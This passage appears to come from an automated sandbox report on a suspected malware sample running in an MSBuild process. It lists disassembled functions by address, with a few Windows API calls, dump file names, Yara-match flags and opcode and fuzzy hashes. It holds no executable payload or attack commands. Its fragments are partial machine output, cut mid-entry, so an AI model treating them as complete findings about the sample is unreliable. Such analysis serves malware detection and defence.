                                                                                                                                            • API String ID: 3997070919-0
                                                                                                                                            • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                                                                            • Instruction ID: 47108b7899804ebb5d40a9255b8f0d240b678f8396b787326aeb691ef157153f
                                                                                                                                            • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                                                                            • Instruction Fuzzy Hash: C0B18F351106089FD715CF28C586B567BE0FF06325F29869AEC99CF3A2C379E986CB44
                                                                                                                                            Function 00432A49 Relevance: 1.8, Strings: 1, Instructions: 500COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 0
                                                                                                                                            • API String ID: 0-4108050209
                                                                                                                                            • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                                                                            • Instruction ID: f72c02501a8b687524d4eed2bba9748ce27a8789a4669d3223b659a6f876a8a8
                                                                                                                                            • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                                                                            • Instruction Fuzzy Hash: 8002B3727083004BD714DF39D95272EF3E2AFCC758F15492EF499AB391DA78A8058A4A
                                                                                                                                            Function 004512EA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2692324296-0
                                                                                                                                            • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                                                            • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                                                                            • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                                                            • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                                                                            Function 00450CF7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1084509184-0
                                                                                                                                            • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                                                            • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                                                                                            • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                                                            • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                                                                                            Function 00433CD7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                            • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                                                            • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                                                                                            • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                            Function 0043D098 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 0-1979702588
                                                                                                                                            • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                                                                            • Instruction ID: 3f92c48b0efc6548e9d2ace3e3fdbc0fca8b075b553eb95927f683fa27391a83
                                                                                                                                            • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                                                                            • Instruction Fuzzy Hash: A4613471E0070867DE385928B896BBF23A8AB0D708F24755BE942DB381D65DDD43C24E
                                                                                                                                            Function 0043CC0C Relevance: 1.5, Strings: 1, Instructions: 214COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 0
                                                                                                                                            • API String ID: 0-4108050209
                                                                                                                                            • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                                            • Instruction ID: e47b97b21f836cd03f295ee90de6feb37cae4df0254a032430ab3cefd666e269
                                                                                                                                            • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                                            • Instruction Fuzzy Hash: C851AC3160070457DF388A6985DA7BF6B959B0E700F18352FE48AFB382C60DED02979E
                                                                                                                                            Function 00426E73 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 0-2766056989
                                                                                                                                            • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                                                                            • Instruction ID: 4dd25ef8aece06dcbd44762d080e1d81d96ea4c89eb3931c7e752ffea448aa68
                                                                                                                                            • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                                                                            • Instruction Fuzzy Hash: 99417576A083158FC314CE29D18021BFBE1FBC8300F568A2EF99693350D679E980CB86
                                                                                                                                            Function 00437150 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: >G
                                                                                                                                            • API String ID: 0-1296849874
                                                                                                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                            • Instruction ID: d77b428d8deff70f46db9a150fef47e19855adfe796a652afc1ecdf390514463
                                                                                                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                            • Instruction Fuzzy Hash: D1110BF724C18143EE74862DD8B46B7A795EACE320F2C636BD0C14B758D52A99459908
                                                                                                                                            Function 10017194 Relevance: .8, Instructions: 751COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                                                                                            • Instruction ID: 44f99013a838546abf86f75096a930c39f9ce457c7277da91ad5f6740c4fb7fb
                                                                                                                                            • Opcode Fuzzy Hash: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                                                                                            • Instruction Fuzzy Hash: 89628C316083958FD324DF28C48469ABBF1FF85384F154A2DE9E98B391E771D989CB42
                                                                                                                                            Function 0044C739 Relevance: .6, Instructions: 637COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                                                                            • Instruction ID: 1fbb2d6a6e610910e1865e113166bba559d0ad1400e2c5ed2b94208389d41108
                                                                                                                                            • Opcode Fuzzy Hash: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                                                                            • Instruction Fuzzy Hash: 4E323621D2AF014DE7639634C862336A649AFB73C5F19D737F81AB5AA6EB2CC4C34105
                                                                                                                                            Function 0041E5DF Relevance: .6, Instructions: 606COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f36ab663cb4d239ef1e0a5f108238eabc662f1d3d061ede5d5b4150ec9228ddd
                                                                                                                                            • Instruction ID: 2a34495ee4f42e5442afe8381c33b9994a027dd0bc8bc0cc3fe6fc4803c66e78
                                                                                                                                            • Opcode Fuzzy Hash: f36ab663cb4d239ef1e0a5f108238eabc662f1d3d061ede5d5b4150ec9228ddd
                                                                                                                                            • Instruction Fuzzy Hash: 9732C1796087469BD714DF2AC4807ABB7E1BF84304F444A2EFC958B381D778DD858B8A
                                                                                                                                            Function 004267CB Relevance: .4, Instructions: 437COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                                                                                                            • Instruction ID: 022d1978040d43b7ea9bbfc0a41ffb8b00617051ae00cac38c3f572af68edcce
                                                                                                                                            • Opcode Fuzzy Hash: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                                                                                                            • Instruction Fuzzy Hash: 0D028F717046518FD318CF2EE880536B7E1AF8E301B46863EE585C7395EB74E922CB95
                                                                                                                                            Function 00426254 Relevance: .4, Instructions: 377COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                                                                                                            • Instruction ID: dd4ce2a6fae4266494c2f053a510589cf36d02151b1693af83bcfdcd1697f2cb
                                                                                                                                            • Opcode Fuzzy Hash: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                                                                                                            • Instruction Fuzzy Hash: 55F13B716142548FC314DF1DE89187BB3E0EB8A301B460A2EF5C2D7392DB78E91ADB56
                                                                                                                                            Function 00431377 Relevance: .4, Instructions: 371COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7363a9fedaeb76f2bf31ad894624b0994c444190ff40f401d8ef5418a52334f3
                                                                                                                                            • Instruction ID: a134442df30985c3d9ded0ed06b90328dea8838589cb671b1bd0994677c35241
                                                                                                                                            • Opcode Fuzzy Hash: 7363a9fedaeb76f2bf31ad894624b0994c444190ff40f401d8ef5418a52334f3
                                                                                                                                            • Instruction Fuzzy Hash: 60D1A171A083158BC721DE29C88096FB7E4FFD8354F446A2EF88597361EB38DD058B86
                                                                                                                                            Function 0041D071 Relevance: .3, Instructions: 276COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                                                                            • Instruction ID: 86422b113df266cbb8d28aa4d41e6099a1760efb4c6ea83322c03ecd969c618c
                                                                                                                                            • Opcode Fuzzy Hash: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                                                                            • Instruction Fuzzy Hash: 46B1817951429A8ACB05EF28C4913F63BA1EF6A300F4851B9EC9CCF757D3399506EB24
                                                                                                                                            Function 00436A8D Relevance: .3, Instructions: 254COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                            • Instruction ID: c2ccfb52f11e3b3b259396a7657262a28929e77abe156aeb413db61674ad6f9a
                                                                                                                                            • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                            • Instruction Fuzzy Hash: EB91C8722080A319DB2D463E847403FFFE19A563A1B1BA79FD4F2CB2C5EE18D564D624
                                                                                                                                            Function 00436D48 Relevance: .2, Instructions: 244COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                            • Instruction ID: 4bc7a19b78b3923bd294324807b23a5e70e392b11aa895e474023c0768c286cc
                                                                                                                                            • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                            • Instruction Fuzzy Hash: 1C91B6762080A35ADB2D463AC43403FFFE15A563A1B1B979FD4F2CB2C5EE18C568D624
                                                                                                                                            Function 004367C6 Relevance: .2, Instructions: 240COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                            • Instruction ID: 8cd81e8b6c8cb135a2d00aee0b4681899237c427d703fcd1ed6b13232f465ad6
                                                                                                                                            • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                            • Instruction Fuzzy Hash: 439195722090A35ADB2D463D843403FFFE15E5A3A1B1B979FD4F2CB2C5EE28C5649624
                                                                                                                                            Function 0043651C Relevance: .2, Instructions: 232COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                            • Instruction ID: b40c52ae0115b4061fe2d1036eda9829452ee7622c5651f608d151b30f65a328
                                                                                                                                            • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                            • Instruction Fuzzy Hash: B081C4722090A319DB2D463E843403FFFE15A563A5B1BA7AFD4F2CB2C5EE18C5649624
                                                                                                                                            Function 0043C9DD Relevance: .2, Instructions: 214COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                                            • Instruction ID: 61f6cd4e2a94a36a6652522188f48ed2bcd63c305fdb574287b7df62abf21a4e
                                                                                                                                            • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                                            • Instruction Fuzzy Hash: BB51677170460D9BDB34E96894E77BFA3899B0E344F18350BD882B7382D60CED02939E
                                                                                                                                            Function 00426FAD Relevance: .2, Instructions: 186COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
